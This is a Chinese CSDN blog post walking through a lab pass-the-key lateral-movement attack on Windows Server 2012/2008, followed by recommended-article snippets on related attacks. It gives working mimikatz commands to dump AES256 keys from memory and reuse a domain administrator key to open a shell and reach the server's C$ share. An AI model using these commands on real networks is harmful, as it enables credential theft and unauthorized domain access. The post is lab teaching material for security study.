Pass the key密钥传递攻击(PTK)横移

最新推荐文章于 2024-06-26 12:49:13 发布
最新推荐文章于 2024-06-26 12:49:13 发布
阅读量195 收藏
点赞数 3
文章标签: 网络安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64787896/article/details/137014799
版权

实验主机:Win2012,Win2008

1.Win2012登陆域管账号,Win2008登陆本地账号

2.Win2012域管账号远程Win2008的域账号,留下ticket

3.WIn2008开启mimikatz_x64.exe,输入sekurlsa::ekeys,查看aes256

sekurlsa::ekeys //查看aes256

(本来是有Win2012的aes256号的,Win2008由于版本原因看不到)

4.将Win2012administrator的aes256输入到mimikatz_x64.exe

sekurlsa::pth /user:administrator /domain:ctfstu.com /aes256:1282da3db4d52e0dda93af119fb933ef23fba44ed2959dc2b086825c5f68fcab

会弹出一个cmd命令框,这时可以直接输入dir \\PC2012.DAMN.com\C$查看Win2012C盘的共享文件夹

eternality269
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透(三十八)之横向移动篇-pass the key 密钥传递攻击(PTK)横向攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-18 707
WinXP/2003/Vista/2008 ,以及未打 KB2871997 补丁之前的 Win7/2008r2/8/2012,这些环境我们都可以使用NTLM哈希传递对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NTLM来进行验证KB2871997:禁止本地管理员账户用于远程连接,这样就无法以本地管理员用户的权限执行wmi、psexec、schtasks、at和访问文件共享。
内网安全:PTH PTK PTT
qq_61553520的博客
01-28 1492
​​​​​​​。
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
weixin_45715461的博客
06-05 1378
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
PTK密钥传递攻击
Y22Lee的博客
05-24 652
PTK(Pass The key),中文叫密钥传递攻击,PTH传递中,使用的是NTLM-HASH值,PTK使用AES256或者AES128的方式进行传递,PTK 攻击只能用于kerberos认证中,NTLM认证中没有!Microsoft发布了KB2871997补丁,它主要囊括了Windows 8.1和Windows Server 2012 R2中增强的安全保护机制。
内网横向移动—PTH哈希&PTT票据&PTK密匙&Kerberos
剁椒鱼头没剁椒的博客
07-17 1354
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
windows内网渗透PTH/PTK攻击
ATpiu的博客
07-18 6154
前言 windows内网渗透中,有三种最常用的pass系列攻击pass the hash(hash传递攻击,简称pth) pass the ticket(票据传递攻击,简称ptt) pass the key密钥传递攻击,简称ptk) 1.1 pass the hash攻击 1.1.1 NTLM HASH windows用户hash主要由以下部分组成,其中NTLM-HASH比LM-HASH的安全性要更高: 用户名称:RID:LM-HASH值:NTLM-HASH值 自Windows Vista和Wi
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
PTKPass the Key)则依赖于AES256密钥,特别是在KB2871997补丁已安装的情况下。它允许攻击者使用AES256密钥代替NTLM哈希进行连接,这在某些情况下使得攻击更为隐蔽和有效。 PTT(Pass the Ticket)涉及的是...
PythonToolkit (PTK)-开源
05-13
Python Toolkit(PTK)是一个强大的开源工具,专为Python编程语言设计,致力于为科学家、工程师以及广大编程爱好者提供一个高效且功能丰富的交互式环境。它的诞生是为了满足对类似Matlab的工作环境的需求,但同时...
PTK9.py
05-11
PTK9.py
校园网模拟PTK设计
12-18
使用思科的PTK软件模拟的一个校园网网络,需要Cisco Packet Tracer软件
ptk888
02-12
关于Laravel Laravel是一个具有表达力,优雅语法的Web应用程序框架。 我们认为,发展必须是一种令人愉悦的创造力,才能真正实现。 Laravel通过减轻许多Web项目中使用的常见任务来减轻开发工作的痛苦,例如: ...
[内网] 横向渗透的几种方式
weixin_43586169的博客
07-28 4702
详细介绍了,横向渗透的黄金IPC$ & PTT & PTH & PTK,以及黄金票据与白银票据的方式
内网渗透- *** PTH(传递哈希)***PTT(传递票据)***PTK传递密钥
战神/calmness的博客
10-01 854
目录 PTH(pass-the-hash) Mimikatz wmiexec 第一种: 第二种: CrackMapExec PTT(pass the ticket) ms14-068 Golden ticket (黄金票据) silver ticket (白银票据) PTK (pass the key) ​​​​​​​ PTH(pass-the-hash) 描述 pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM .
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8306
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
讨论stl链表
最新发布
yishaobai的博客
06-26 502
链表是一个序列容器,在任意位置都可以用常数时间插入或者删除,并且可以在两个方向进行迭代。
Pythonnet能导入clr,但无法引入System模块?
警警的博客
06-25 455
Python.Runtime.PythonException: 'list' value cannot be converted to System.Collections. Generic.List`1[System.Single],大概可以理解为python中list无法转化为.Net中List[T为泛型]不直接支持C#的泛型列表,你需要将Python列表转换为C#可以理解的数组或其他集合类型。此时报错,无法导入System模块(.Net系统工作空间) ,然后在网上看到博客(
.NET C# 树遍历、查询、拷贝与可视化
小小程序猿
06-26 932
树结构组件,支持查询、遍历、拷贝、可视树过滤(不改变树结构,只过滤显示效果)
WiFi KARACK漏洞说明
08-09
WPA2曾被认为是相对安全的,因为它使用了预共享密钥(PSK)、一个临时的Pairwise Temporal KeyPTK)以及两个非ces(A-Nonce和S-Nonce),这些元素旨在增强加密过程的安全性。 4-way handshake的误解在于,尽管它...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值